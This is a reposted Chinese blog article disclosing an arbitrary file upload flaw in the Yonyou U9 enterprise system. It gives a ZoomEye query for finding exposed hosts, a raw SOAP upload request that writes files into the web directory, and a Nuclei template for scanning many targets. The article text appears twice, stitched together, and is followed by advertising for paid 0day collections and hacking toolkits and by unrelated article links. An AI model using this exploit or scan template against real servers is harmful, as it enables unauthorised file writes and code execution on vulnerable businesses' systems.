用友系统-U9企业版存在任意文件上传漏洞(新接口)-漏洞挖掘

2024-05-14 16:20

本文主要是介绍用友系统-U9企业版存在任意文件上传漏洞(新接口)-漏洞挖掘,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

0x01 产品简介

   用友系统-U9 cloud是基于最新应用平台,全新系统架构及开发技术,适配安可要求,融合生态发展,开放标准数据服务接口,并与用友系统-U9 cloud系列产品无缝融合应用,打造场景化、数据化工作驱动的全新产品。这里我推荐利用 **Zo**omEye****搜索引擎直接输入关键字即可,影响资产9000+。

声明

请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。

TIPS: 末尾领取资料及福利-批量检测脚本在末尾

0x02 漏洞描述

    文件上传漏洞是指Web服务器允许用户将文件上传到其文件系统,而不充分验证文件的名称、类型、内容或大小等内容。如果不能正确地执行这些限制,可能意味着即使是基本的图像上传功能也可以用来上传任意的和潜在危险的文件。这甚至可以包括支持远程代码执行的服务器端脚本文件。

0x03 ZoomEye语法

app:"用友 U9"

0x04 漏洞复现

POC

POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1``Host: {}``Cache-Control: max-age=0``Upgrade-Insecure-Requests: 1``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36``Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7``Accept-Encoding: gzip, deflate, br``Accept-Language: zh-CN,zh;q=0.9``Cookie: .ASPXANONYMOUS=1OJZqnZ03AEkAAAAZGQ2ZDU0NzYtMDdiZS00YWJhLTk2ZTMtNmRhYTgxNDM5OTNi0; ASP.NET_SessionId=md4bw5fgleu1cxfdwk4w0o4n``Connection: close``Content-Type: text/xml; charset=utf-8``Content-Length: 433``   ``<?xml version="1.0" encoding="utf-8"?>``<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">`  `<soap:Body>`    `<SaveFile xmlns="http://tempuri.org/">`      `<binData>VXBsb2FkLXN1Y2Nlc3NmdWxseQ==</binData>`      `<path>./</path>`      `<fileName>123.txt</fileName>`    `</SaveFile>`  `</soap:Body>``</soap:Envelope>

Nuclei批量检测POC(请自行搭建环境检测)

id: yonyou-U9-PatchFile-asmx-uploadfile``   ``info:`  `name: yonyou-U9-PatchFile-asmx-uploadfile`  `author: 渗透安全HackTwo`  `severity: high``   `  `description: |`    `漏洞测试-公众号-渗透安全HackTwo`  `reference:`    `- https://127.0.0.1`  `tags: auto``   ``variables:`  `filename: "{{to_lower(rand_base(10))}}"`  `boundary: "{{to_lower(rand_base(20))}}"``   ``http:`  `- raw:`      `- |`        `POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1`        `Host:{{Hostname}}`        `Accept-Encoding: gzip, deflate, br`        `Accept-Language: zh-CN,zh;q=0.9b`        `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`        `Content-Type: text/xml; charset=utf-8`        `Connection: close`        `        <?xml version="1.0" encoding="utf-8"?>`        `<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">`          `<soap:Body>`            `<SaveFile xmlns="http://tempuri.org/">`              `<binData>VXBsb2FkLXN1Y2Nlc3NmdWxseQ==</binData>`              `<path>./</path>`              `<fileName>{{filename}}.txt</fileName>`            `</SaveFile>`          `</soap:Body>`        `</soap:Envelope>`        `   `      `- |`        `GET /CS/Office/AutoUpdates/{{filename}}.txt HTTP/1.1`        `Host: {{Hostname}}`        `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36``   `    `matchers:`      `- type: dsl`        `dsl:`          `- status_code==200 && contains_all(body,"Upload-successfully")

0x05 修复建议

升级至最新版本,官方已经推出新的版本补丁包。

0x06 内部福利介绍-更新啦!

近期更新的0day/1day(包含公开和未公开漏洞-仅列举部分)漏洞整理更新至520+

由于篇幅有限,各位直接点击嚯取哦:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图

一些漏洞报告200+(仅列举部分)加入星球获取更多资源及视频资源持续更新中!

    需要加入内部知识星球可点击下方链接,资源包含但不限于网上未公开的day漏洞(更新漏洞POC共500+),2024最新企业SRC/CNVD/Edu实战挖掘技巧报告,红队内网横向渗透,代码审计,JS逆向,SRC培训等课程。圈子对新人友好,加入圈子拥有FOFA shadan 360Quake ZoomEye Tide 零零信安Hunter等等高级会员账号,SRC文档,武器库。**圈子里面资料价值至少在10K以上,目前星球内部主题400+,资源2000+,其他和网盘资源1w+并持续更新中,越早加入价格越低**。(详情点击下方地址了解-->>还是觉得价格贵的师傅后台回复" **星球** "有优惠券使用名额有限先到先得)

点击了解———内部VIP知识星球福利介绍V1.2版本 :CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

(http://mp.weixin.qq.com/s?__biz=Mzg3ODE2MjkxMQ==&mid=2247484713&idx=1&sn=0fdab59445d9e0849843077365607b18&chksm=cf16a399f8612a8f6feb8362b1d946ea15ce4ff8a4a4cf0ce2c21f433185c622136b3c5725f3&scene=21#wechat_redirect)**

结尾

免责声明

获取方法

回复“app" 获取 app渗透和app抓包教程

回复“渗透字典" 获取 针对一些字典重新划分处理,收集了几个密码管理字典生成器用来扩展更多字典的仓库。

回复“书籍" 获取 网络安全相关经典书籍电子版pdf

压缩包解压密码:HackTwo

免责声明

  文章中的案例或工具仅面向合法授权的企业安全建设行为,如您需要测试内容的可用性,请自行搭建靶机环境,勿用于非法行为。如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击和漏洞利用。文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用。如您在使用本工具或阅读文章的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。本工具或文章或来源于网络,若有侵权请联系作者删除,请在24小时内删除,请勿用于商业行为,自行查验是否具有后门,切勿相信软件内的广告!

喜欢的朋友可以点赞转发支持一下

本文转自 https://mp.weixin.qq.com/s/yRgOKGLuBCxpZz1nCBuzEQ,如有侵权,请联系删除。0x01 产品简介

   用友系统-U9 cloud是基于最新应用平台,全新系统架构及开发技术,适配安可要求,融合生态发展,开放标准数据服务接口,并与用友系统-U9 cloud系列产品无缝融合应用,打造场景化、数据化工作驱动的全新产品。这里我推荐利用 **Zo**omEye****搜索引擎直接输入关键字即可,影响资产9000+。

声明

请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。

TIPS: 末尾领取资料及福利-批量检测脚本在末尾

0x02 漏洞描述

    文件上传漏洞是指Web服务器允许用户将文件上传到其文件系统,而不充分验证文件的名称、类型、内容或大小等内容。如果不能正确地执行这些限制,可能意味着即使是基本的图像上传功能也可以用来上传任意的和潜在危险的文件。这甚至可以包括支持远程代码执行的服务器端脚本文件。

0x03 ZoomEye语法

app:"用友 U9"

0x04 漏洞复现

POC

POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1``Host: {}``Cache-Control: max-age=0``Upgrade-Insecure-Requests: 1``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36``Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7``Accept-Encoding: gzip, deflate, br``Accept-Language: zh-CN,zh;q=0.9``Cookie: .ASPXANONYMOUS=1OJZqnZ03AEkAAAAZGQ2ZDU0NzYtMDdiZS00YWJhLTk2ZTMtNmRhYTgxNDM5OTNi0; ASP.NET_SessionId=md4bw5fgleu1cxfdwk4w0o4n``Connection: close``Content-Type: text/xml; charset=utf-8``Content-Length: 433``   ``<?xml version="1.0" encoding="utf-8"?>``<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">`  `<soap:Body>`    `<SaveFile xmlns="http://tempuri.org/">`      `<binData>VXBsb2FkLXN1Y2Nlc3NmdWxseQ==</binData>`      `<path>./</path>`      `<fileName>123.txt</fileName>`    `</SaveFile>`  `</soap:Body>``</soap:Envelope>

Nuclei批量检测POC(请自行搭建环境检测)

id: yonyou-U9-PatchFile-asmx-uploadfile``   ``info:`  `name: yonyou-U9-PatchFile-asmx-uploadfile`  `author: 渗透安全HackTwo`  `severity: high``   `  `description: |`    `漏洞测试-公众号-渗透安全HackTwo`  `reference:`    `- https://127.0.0.1`  `tags: auto``   ``variables:`  `filename: "{{to_lower(rand_base(10))}}"`  `boundary: "{{to_lower(rand_base(20))}}"``   ``http:`  `- raw:`      `- |`        `POST /CS/Office/AutoUpdates/PatchFile.asmx HTTP/1.1`        `Host:{{Hostname}}`        `Accept-Encoding: gzip, deflate, br`        `Accept-Language: zh-CN,zh;q=0.9b`        `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`        `Content-Type: text/xml; charset=utf-8`        `Connection: close`        `        <?xml version="1.0" encoding="utf-8"?>`        `<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">`          `<soap:Body>`            `<SaveFile xmlns="http://tempuri.org/">`              `<binData>VXBsb2FkLXN1Y2Nlc3NmdWxseQ==</binData>`              `<path>./</path>`              `<fileName>{{filename}}.txt</fileName>`            `</SaveFile>`          `</soap:Body>`        `</soap:Envelope>`        `   `      `- |`        `GET /CS/Office/AutoUpdates/{{filename}}.txt HTTP/1.1`        `Host: {{Hostname}}`        `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36``   `    `matchers:`      `- type: dsl`        `dsl:`          `- status_code==200 && contains_all(body,"Upload-successfully")

0x05 修复建议

升级至最新版本,官方已经推出新的版本补丁包。

0x06 内部福利介绍-更新啦!

近期更新的0day/1day(包含公开和未公开漏洞-仅列举部分)漏洞整理更新至520+需要的加入星球获取

一些漏洞报告200+(仅列举部分)加入星球获取更多资源及视频资源持续更新中!

题外话

初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:

  • 2023届全国高校毕业生预计达到1158万人,就业形势严峻;

  • 国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。

一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。

6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。

具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
在这里插入图片描述

“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。

网络安全行业特点

1、就业薪资非常高,涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!

2、人才缺口大,就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。

行业发展空间大,岗位非常多

网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。

从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

由于篇幅有限,各位直接点击嚯取哦:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

1.学习路线图

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

由于篇幅有限,各位直接点击嚯取哦:CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

请添加图片描述

这篇关于用友系统-U9企业版存在任意文件上传漏洞(新接口)-漏洞挖掘的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/989240

相关文章

Python FastAPI+Celery+RabbitMQ实现分布式图片水印处理系统

《PythonFastAPI+Celery+RabbitMQ实现分布式图片水印处理系统》这篇文章主要为大家详细介绍了PythonFastAPI如何结合Celery以及RabbitMQ实现简单的分布式... 实现思路FastAPI 服务器Celery 任务队列RabbitMQ 作为消息代理定时任务处理完整

Linux系统中卸载与安装JDK的详细教程

《Linux系统中卸载与安装JDK的详细教程》本文详细介绍了如何在Linux系统中通过Xshell和Xftp工具连接与传输文件,然后进行JDK的安装与卸载,安装步骤包括连接Linux、传输JDK安装包... 目录1、卸载1.1 linux删除自带的JDK1.2 Linux上卸载自己安装的JDK2、安装2.1

go中空接口的具体使用

《go中空接口的具体使用》空接口是一种特殊的接口类型,它不包含任何方法,本文主要介绍了go中空接口的具体使用,具有一定的参考价值,感兴趣的可以了解一下... 目录接口-空接口1. 什么是空接口?2. 如何使用空接口?第一,第二,第三,3. 空接口几个要注意的坑坑1:坑2:坑3:接口-空接口1. 什么是空接

MySQL INSERT语句实现当记录不存在时插入的几种方法

《MySQLINSERT语句实现当记录不存在时插入的几种方法》MySQL的INSERT语句是用于向数据库表中插入新记录的关键命令,下面:本文主要介绍MySQLINSERT语句实现当记录不存在时... 目录使用 INSERT IGNORE使用 ON DUPLICATE KEY UPDATE使用 REPLACE

Linux系统之主机网络配置方式

《Linux系统之主机网络配置方式》:本文主要介绍Linux系统之主机网络配置方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、查看主机的网络参数1、查看主机名2、查看IP地址3、查看网关4、查看DNS二、配置网卡1、修改网卡配置文件2、nmcli工具【通用

Linux系统之dns域名解析全过程

《Linux系统之dns域名解析全过程》:本文主要介绍Linux系统之dns域名解析全过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、dns域名解析介绍1、DNS核心概念1.1 区域 zone1.2 记录 record二、DNS服务的配置1、正向解析的配置

Linux系统中配置静态IP地址的详细步骤

《Linux系统中配置静态IP地址的详细步骤》本文详细介绍了在Linux系统中配置静态IP地址的五个步骤,包括打开终端、编辑网络配置文件、配置IP地址、保存并重启网络服务,这对于系统管理员和新手都极具... 目录步骤一:打开终端步骤二:编辑网络配置文件步骤三:配置静态IP地址步骤四:保存并关闭文件步骤五:重

Java实现数据库图片上传与存储功能

《Java实现数据库图片上传与存储功能》在现代的Web开发中,上传图片并将其存储在数据库中是常见的需求之一,本文将介绍如何通过Java实现图片上传,存储到数据库的完整过程,希望对大家有所帮助... 目录1. 项目结构2. 数据库表设计3. 实现图片上传功能3.1 文件上传控制器3.2 图片上传服务4. 实现

使用mvn deploy命令上传jar包的实现

《使用mvndeploy命令上传jar包的实现》本文介绍了使用mvndeploy:deploy-file命令将本地仓库中的JAR包重新发布到Maven私服,文中通过示例代码介绍的非常详细,对大家的学... 目录一、背景二、环境三、配置nexus上传账号四、执行deploy命令上传包1. 首先需要把本地仓中要

Windows系统下如何查找JDK的安装路径

《Windows系统下如何查找JDK的安装路径》:本文主要介绍Windows系统下如何查找JDK的安装路径,文中介绍了三种方法,分别是通过命令行检查、使用verbose选项查找jre目录、以及查看... 目录一、确认是否安装了JDK二、查找路径三、另外一种方式如果很久之前安装了JDK,或者在别人的电脑上,想